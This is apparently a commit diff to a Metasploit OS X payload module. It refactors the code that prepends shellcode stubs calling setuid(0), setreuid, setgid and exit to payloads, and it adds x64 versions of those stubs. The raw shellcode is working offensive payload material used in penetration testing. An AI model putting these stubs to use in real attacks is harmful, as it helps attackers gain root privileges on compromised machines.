@@ -23,145 +23,205 @@ def initialize(info = {})
2323 [
2424 false ,
2525 "Prepend a stub that executes the setresuid(0, 0, 0) system call" ,
26- " false"
26+ false
2727 ]
2828 ) ,
2929 Msf ::OptBool . new ( 'PrependSetreuid' ,
3030 [
3131 false ,
3232 "Prepend a stub that executes the setreuid(0, 0) system call" ,
33- " false"
33+ false
3434 ]
3535 ) ,
3636 Msf ::OptBool . new ( 'PrependSetuid' ,
3737 [
3838 false ,
3939 "Prepend a stub that executes the setuid(0) system call" ,
40- " false"
40+ false
4141 ]
4242 ) ,
4343 Msf ::OptBool . new ( 'PrependSetresgid' ,
4444 [
4545 false ,
4646 "Prepend a stub that executes the setresgid(0, 0, 0) system call" ,
47- " false"
47+ false
4848 ]
4949 ) ,
5050 Msf ::OptBool . new ( 'PrependSetregid' ,
5151 [
5252 false ,
5353 "Prepend a stub that executes the setregid(0, 0) system call" ,
54- " false"
54+ false
5555 ]
5656 ) ,
5757 Msf ::OptBool . new ( 'PrependSetgid' ,
5858 [
5959 false ,
6060 "Prepend a stub that executes the setgid(0) system call" ,
61- " false"
61+ false
6262 ]
6363 ) ,
6464 Msf ::OptBool . new ( 'AppendExit' ,
6565 [
6666 false ,
6767 "Append a stub that executes the exit(0) system call" ,
68- " false"
68+ false
6969 ]
7070 ) ,
7171 ] , Msf ::Payload ::Osx )
7272
7373 ret
7474 end
7575
76-
77- #
78- # Overload the generate() call to prefix our stubs
79- #
80- def generate ( *args )
81- # Call the real generator to get the payload
82- buf = super ( *args )
76+ def apply_prepends ( buf )
77+ test_arch = [ *( self . arch ) ]
8378 pre = ''
8479 app = ''
8580
86- test_arch = [ *( self . arch ) ]
87-
8881 # Handle all x86 code here
8982 if ( test_arch . include? ( ARCH_X86 ) )
83+ handle_x86_osx_opts ( pre , app )
84+ elsif ( test_arch . include? ( ARCH_X86_64 ) )
85+ handle_x64_osx_opts ( pre , app )
86+ end
87+
88+ pre + buf + app
89+ end
90+
91+ def handle_x86_osx_opts ( pre , app )
92+ if ( datastore [ 'PrependSetresuid' ] )
93+ # setresuid(0, 0, 0)
94+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
95+ "\x50 " +# pushl %eax #
96+ "\x50 " +# pushl %eax #
97+ "\x50 " +# pushl %eax #
98+ "\x50 " +# pushl %eax #
99+ "\x66 \xb8 \x37 \x01 " +# movw $0x0137,%ax #
100+ "\xcd \x80 " # int $0x80 #
101+ end
102+
103+ if ( datastore [ 'PrependSetreuid' ] )
104+ # setreuid(0, 0)
105+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
106+ "\x50 " +# pushl %eax #
107+ "\x50 " +# pushl %eax #
108+ "\x50 " +# pushl %eax #
109+ "\xb0 \x7e " +# movb $0x7e,%al #
110+ "\xcd \x80 " # int $0x80 #
111+ end
112+
113+ if ( datastore [ 'PrependSetuid' ] )
114+ # setuid(0)
115+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
116+ "\x50 " +# pushl %eax #
117+ "\x50 " +# pushl %eax #
118+ "\xb0 \x17 " +# movb $0x17,%al #
119+ "\xcd \x80 " # int $0x80 #
120+ end
121+
122+ if ( datastore [ 'PrependSetresgid' ] )
123+ # setresgid(0, 0, 0)
124+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
125+ "\x50 " +# pushl %eax #
126+ "\x50 " +# pushl %eax #
127+ "\x50 " +# pushl %eax #
128+ "\x50 " +# pushl %eax #
129+ "\x66 \xb8 \x38 \x01 " +# movw $0x0138,%ax #
130+ "\xcd \x80 " # int $0x80 #
131+ end
90132
91- # Prepend
92-
93- if ( datastore [ 'PrependSetresuid' ] )
94- # setresuid(0, 0, 0)
95- pre << "\x31 \xc0 " +# xorl %eax,%eax #
96- "\x50 " +# pushl %eax #
97- "\x50 " +# pushl %eax #
98- "\x50 " +# pushl %eax #
99- "\x50 " +# pushl %eax #
100- "\x66 \xb8 \x37 \x01 " +# movw $0x0137,%ax #
101- "\xcd \x80 " # int $0x80 #
102- end
103-
104- if ( datastore [ 'PrependSetreuid' ] )
105- # setreuid(0, 0)
106- pre << "\x31 \xc0 " +# xorl %eax,%eax #
107- "\x50 " +# pushl %eax #
108- "\x50 " +# pushl %eax #
109- "\x50 " +# pushl %eax #
110- "\xb0 \x7e " +# movb $0x7e,%al #
111- "\xcd \x80 " # int $0x80 #
112- end
113-
114- if ( datastore [ 'PrependSetuid' ] )
115- # setuid(0)
116- pre << "\x31 \xc0 " +# xorl %eax,%eax #
117- "\x50 " +# pushl %eax #
118- "\x50 " +# pushl %eax #
119- "\xb0 \x17 " +# movb $0x17,%al #
120- "\xcd \x80 " # int $0x80 #
121- end
122-
123- if ( datastore [ 'PrependSetresgid' ] )
124- # setresgid(0, 0, 0)
125- pre << "\x31 \xc0 " +# xorl %eax,%eax #
126- "\x50 " +# pushl %eax #
127- "\x50 " +# pushl %eax #
128- "\x50 " +# pushl %eax #
129- "\x50 " +# pushl %eax #
130- "\x66 \xb8 \x38 \x01 " +# movw $0x0138,%ax #
131- "\xcd \x80 " # int $0x80 #
132- end
133-
134- if ( datastore [ 'PrependSetregid' ] )
135- # setregid(0, 0)
136- pre << "\x31 \xc0 " +# xorl %eax,%eax #
137- "\x50 " +# pushl %eax #
138- "\x50 " +# pushl %eax #
139- "\x50 " +# pushl %eax #
140- "\xb0 \x7f " +# movb $0x7f,%al #
141- "\xcd \x80 " # int $0x80 #
142- end
143-
144- if ( datastore [ 'PrependSetgid' ] )
145- # setgid(0)
146- pre << "\x31 \xc0 " +# xorl %eax,%eax #
147- "\x50 " +# pushl %eax #
148- "\x50 " +# pushl %eax #
149- "\xb0 \xb5 " +# movb $0xb5,%al #
150- "\xcd \x80 " # int $0x80 #
151- end
152- # Append
153-
154- if ( datastore [ 'AppendExit' ] )
155- # exit(0)
156- app << "\x31 \xc0 " +# xorl %eax,%eax #
157- "\x50 " +# pushl %eax #
158- "\xb0 \x01 " +# movb $0x01,%al #
159- "\xcd \x80 " # int $0x80 #
160- end
133+ if ( datastore [ 'PrependSetregid' ] )
134+ # setregid(0, 0)
135+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
136+ "\x50 " +# pushl %eax #
137+ "\x50 " +# pushl %eax #
138+ "\x50 " +# pushl %eax #
139+ "\xb0 \x7f " +# movb $0x7f,%al #
140+ "\xcd \x80 " # int $0x80 #
141+ end
161142
143+ if ( datastore [ 'PrependSetgid' ] )
144+ # setgid(0)
145+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
146+ "\x50 " +# pushl %eax #
147+ "\x50 " +# pushl %eax #
148+ "\xb0 \xb5 " +# movb $0xb5,%al #
149+ "\xcd \x80 " # int $0x80 #
162150 end
163151
164- return ( pre + buf + app )
152+ if ( datastore [ 'AppendExit' ] )
153+ # exit(0)
154+ app << "\x31 \xc0 " +# xorl %eax,%eax #
155+ "\x50 " +# pushl %eax #
156+ "\xb0 \x01 " +# movb $0x01,%al #
157+ "\xcd \x80 " # int $0x80 #
158+ end
159+ end
160+
161+ def handle_x64_osx_opts ( pre , app )
162+ if ( datastore [ 'PrependSetresuid' ] )
163+ # setresuid(0, 0, 0)
164+ raise RuntimeError , "setresuid syscall is not implemented on x64 OSX systems"
165+ end
166+
167+ if ( datastore [ 'PrependSetreuid' ] )
168+ # setreuid(0, 0)
169+ pre << "\x41 \xb0 \x02 " +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
170+ "\x49 \xc1 \xe0 \x18 " +# shl r8, 24
171+ "\x49 \x83 \xc8 \x7e " +# or r8, 126 (setreuid=126)
172+ "\x4c \x89 \xc0 " +# mov rax, r8
173+ "\x48 \x31 \xff " +# xor rdi, rdi 0
174+ "\x48 \x31 \xf6 " +# xor rsi, rsi 0
175+ "\x0f \x05 " # syscall
176+ end
177+
178+ if ( datastore [ 'PrependSetuid' ] )
179+ # setuid(0)
180+ pre << "\x41 \xb0 \x02 " +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
181+ "\x49 \xc1 \xe0 \x18 " +# shl r8, 24
182+ "\x49 \x83 \xc8 \x17 " +# or r8, 23 (setuid=23)
183+ "\x4c \x89 \xc0 " +# mov rax, r8
184+ "\x48 \x31 \xff " +# xor rdi, rdi 0
185+ "\x0f \x05 " # syscall
186+ end
187+
188+ if ( datastore [ 'PrependSetresgid' ] )
189+ # setresgid(0, 0, 0)
190+ raise RuntimeError , "setresgid syscall is not implemented on x64 OSX systems"
191+ end
192+
193+ if ( datastore [ 'PrependSetregid' ] )
194+ # setregid(0, 0)
195+ pre << "\x41 \xb0 \x02 " +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
196+ "\x49 \xc1 \xe0 \x18 " +# shl r8, 24
197+ "\x49 \x83 \xc8 \x7f " +# or r8, 127 (setregid=127)
198+ "\x4c \x89 \xc0 " +# mov rax, r8
199+ "\x48 \x31 \xff " +# xor rdi, rdi 0
200+ "\x48 \x31 \xf6 " +# xor rsi, rsi 0
201+ "\x0f \x05 " # syscall
202+ end
203+
204+ if ( datastore [ 'PrependSetgid' ] )
205+ # setgid(0)
206+ pre << "\x41 \xb0 \x02 " +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
207+ "\x49 \xc1 \xe0 \x17 " +# shl r8, 23
208+ "\x49 \x83 \xc8 \x5a " +# or r8, 90 (setgid=181>>1=90)
209+ "\x49 \xd1 \xe0 " +# shl r8, 1
210+ "\x49 \x83 \xc8 \x01 " +# or r8, 1 (setgid=181&1=1)
211+ "\x4c \x89 \xc0 " +# mov rax, r8
212+ "\x48 \x31 \xff " +# xor rdi, rdi 0
213+ "\x0f \x05 " # syscall
214+ end
215+
216+ if ( datastore [ 'AppendExit' ] )
217+ # exit(0)
218+ app << "\x41 \xb0 \x02 " +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
219+ "\x49 \xc1 \xe0 \x18 " +# shl r8, 24
220+ "\x49 \x83 \xc8 \x01 " +# or r8, 1 (exit=1)
221+ "\x4c \x89 \xc0 " +# mov rax, r8
222+ "\x48 \x31 \xff " +# xor rdi, rdi 0
223+ "\x0f \x05 " # syscall
224+ end
165225 end
166226
167227
0 commit comments